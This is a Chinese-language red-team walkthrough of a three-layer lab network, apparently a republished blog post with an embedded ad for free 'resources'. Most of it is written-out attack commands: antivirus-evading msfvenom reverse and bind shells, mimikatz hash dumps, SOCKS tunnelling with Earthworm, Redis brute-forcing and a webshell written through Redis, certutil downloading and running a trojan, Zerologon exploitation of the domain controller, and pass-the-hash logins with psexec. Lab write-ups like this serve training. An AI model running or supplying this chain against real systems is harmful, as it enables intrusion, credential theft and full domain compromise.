您現在的位置是:首頁 > 棋牌
安全攻防實戰系列MSF
- 由 小熊編tips 發表于 棋牌
- 2021-12-11
二年級4095接近幾千
在紅隊攻防中,我們主要在外網進行資訊收集,透過cms或者其他漏洞拿到shell,之後透過免殺木馬將windows或linux伺服器上線到cobalt strike或msf等c2伺服器,之後對內網進行資訊收集並繪製網路拓撲圖,進行工作組或域滲透,拿到各個網段機器的許可權,遠端登入並截圖證明。
環境配置
從虛擬機器網路來看
機器描述
攻擊機:win10:192。168。1。6kali:192。168。1。10第一層:12server-bt:192。168。1。5192。168。59。133第二層:12server-redis:192。168。59。410。10。10。202第三層:12server-ex13:10。10。10。209第三層:12server-dc:10。10。10。201192。168。59。133 存在殺軟(火絨), 可通外網, 可訪問server-redis192。168。59。4/10。10。10。202 不通外網,可以通內網兩個機器,也可以訪問到機器server-bt,10。10。10。209 為郵服, 只能內網機器互相訪問10。10。10。201 為 DC
【一>所有資源關注我,私信回覆“資料”獲取<一】
1、200份很多已經買不到的絕版電子書
2、30G安全大廠內部的影片資料
3、100份src文件
4、常見安全面試題
5、ctf大賽經典題目解析
6、全套工具包
7、應急響應筆記
8、網路安全學習路線
目錄如下
第一層 server-bt
蟻劍拿shell
msf免殺拿shell
使用msfvenom生成免殺木馬payload,裡面的IP和埠自行修改,就是反彈shell的kali
msfvenom -p windows/meterpreter/reverse_tcp lhost=192。168。1。10 lport=6666 -e x86/shikata_ga_nai -i 12 -f raw -o msf。bin
使用分離免殺工具生成loader。exe檔案
對生成的exe檔案進行加殼免殺
免殺效果如下
免殺之後透過蟻劍上傳到server-bt上
msf開啟監聽
msfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192。168。1。10set lport 6666run
蟻劍執行
getuid
ps
migrate 476
msf內網滲透
load mimikatz # 載入Mimikatz模組
抓取Hash
meterpreter > mimikatz_command -f samdump::hashes
hashdump
然後抓到了 hash:
透過解密得到了 administrator 的密碼
route print # 列印路由資訊
對內網進行掃描 arp 存活
run post/windows/gather/arp_scanner rhosts=192。168。59。0/24
配置路由
meterpreter > run autoroute -s 192。168。59。0/24
開啟遠端桌面
run post/windows/manage/enable_rdp
成功開啟了遠端桌面,並且生成了一個txt檔案,這個txt檔案往後可用來關閉遠端桌面,關閉命令
run multi_console_command -r /root/。msf4/loot/xx_default_192。168。1。5_host。windows。cle_xxx5。txt
繞過火絨新增使用者
螞蟻劍或者cs上傳新增使用者。exe
執行檔案
帳號
:hxxxr 密碼:Pxxxxd
遠端登入server-bt
許可權提升
使用psexec。exe可以提升到system許可權
psexec。exe -accepteula -s -i -d cmd。exe
但是桌面還是之前使用者的許可權啟動的
為了完全提權,我們可以在system的cmd裡面輸入taskmgr。exe來啟動任務管理器
在任務管理器裡面我們結束掉之前由之前賬號開啟的桌面程序
然後再新增一個由system許可權下開啟的桌面程序
再點入看現在登入的賬號是
第二層 server-redis
Earthworm穿透
上傳EW(Earthworm)到C:/wwwroot/
伺服器端執行以下命令
execute C:\wwwroot\ew。exe -s ssocksd -l 1090
這裡還需要修改proxychains。conf配置檔案
$ vim /etc/proxychains。confsocks5 192。168。1。5 1090
探測內網網段存活主機
proxychains nmap -sT -Pn -p 80 192。168。59。0/24
192。168。59。4是存活的,我們著重看一下,發現開了80和6379
Redis-getshell
kali環境進行爆破
proxychains hydra -P /usr/xxx/password。lst 192。168。59。4 redis 6379
得到Redis口令:
連線redis
proxychains src/redis-cli -h 192。168。59。4 -a 1xxxxx
備份檔案寫Shell
192。168。59。4:6379>config set dir “C:\\inetpub\\wwwroot” 進入預設目錄192。168。59。4:6379>config set dbfilename “redis。asp” 建立檔案192。168。59。4:6379>set x “<%eval request(\”chopper\“)%>” 寫入webshell192。168。59。4:6379>save 最後儲存
利用過程
代理蟻劍進行連線這個shell
成功連線到server-redis
並檢視許可權
利用蟻劍把SweetPotato。exe(甜土豆)上傳到C:/Redis/或者C:/ProgramData/目錄下
成功進行提權
msf正向免殺木馬拿到shell
Earthworm穿透
掛代理,透過之前上傳的EW(Earthworm)
伺服器端執行以下命令(關掉server-bt的防火牆代理才能生效)
execute C:\wwwroot\ew。exe -s ssocksd -l 1090
這裡還需要修改proxychains。conf配置檔案
$ vim /etc/proxychains。confsocks5 192。168。1。5 1090
msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f raw -o msf1。bin
用msfvenom生成一個正向馬傳進去(因為無法訪問外網,反向出不來),msf正向連線。
使用分離免殺工具生成loader。exe檔案
改名為msf1。exe,進行加殼免殺
免殺效果如下
先把木馬透過螞蟻劍上傳到寶塔(需要進行免殺),火絨未告警
透過redis的shell進行操作,192。168。59。4遠端下載192。168。59。133上的馬
C:\ProgramData\xxxx。exe -i -c “certutil -urlcache -split -f http://192。168。59。133/msf1。exe msf1。exe
再透過提權工具進行執行
C:\ProgramData\xxxx。exe -i -c “msf1。exe”
也可以直接將木馬上傳到server-redis的C:/Redis/可寫目錄下就不需要免殺了
msf透過代理開啟監聽
proxychains msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset RHOST 192。168。59。4set lport 4444run
成功獲取伺服器的shell,之後就是各種許可權維持了。建立計劃任務、開機自啟等等都能夠實現。
ps
migrate 3992getuidgetsystemgetuid
新增賬戶和遠端連線同第一層
msf內網滲透
load mimikatz # 載入Mimikatz模組
抓取Hash
meterpreter > mimikatz_command -f samdump::hashes
hashdump
得到12SERVER-REDIS賬號密碼:
route print # 列印路由資訊
配置路由
meterpreter > run autoroute -s 10。10。10。0/24
run autoroute -p
透過螞蟻劍將nbtscan。exe上傳到server-redis的Redis可讀寫目錄下
探測內網段存活
nbtscan。exe 10。10。10。0/24
ipconfig /all
10。10。10。0/24段的DNS伺服器是10。10。10。201 而在域環境中DNS伺服器就是當前使用的域控制器
新增完路由後可以透過msf訪問所有機器,訪問域控
proxychains curl 10。10。10。201
第三層 server-dc
zerologon(CVE-2020-1472)漏洞復現
這裡已經滿足觸發zerologon的兩個條件,能ping通域控制器,知道域控計算機名,當然最後dump出域內所有hash的時候需要域名
置空域控機器使用者NTLM hash
proxychains python3 cve-2020-1472-exploit。py 12server-dc$ 10。10。10。201
接下來用置空的機器賬戶dump所有hash
(890c這個hash就是”空“的NTML hash)
我們的目標是獲得域內administrator的hash,然後就可以hash傳遞,登陸任意域內機器
proxychains wmiexec。py -hashes :42e265xxxxxx62387 administrator@10。10。10。201
利用 psexec(PTH)上線server-dc到 MSF:
proxychains msfconsoleuse exploit/windows/smb/psexecset RHOST 10。10。10。201set SMBUser Administratorset SMBPass aad3bxxxxxxxx4ee:42e265xxxxxx962387set SMBDomain xxxxxset payload windows/x64/meterpreter/bind_tcp_rc4set LPORT 4446 run
成功獲取到shell
利用 psexec 上線server-ex13到 MSF:
proxychains msfconsoleuse exploit/windows/smb/psexecset RHOST 10。10。10。209set SMBUser Administratorset SMBPass aad3bxxxxxxxee:42exxxxxxx387set SMBDomain xxxxset payload windows/x64/meterpreter/bind_tcp_rc4set LPORT 4447 run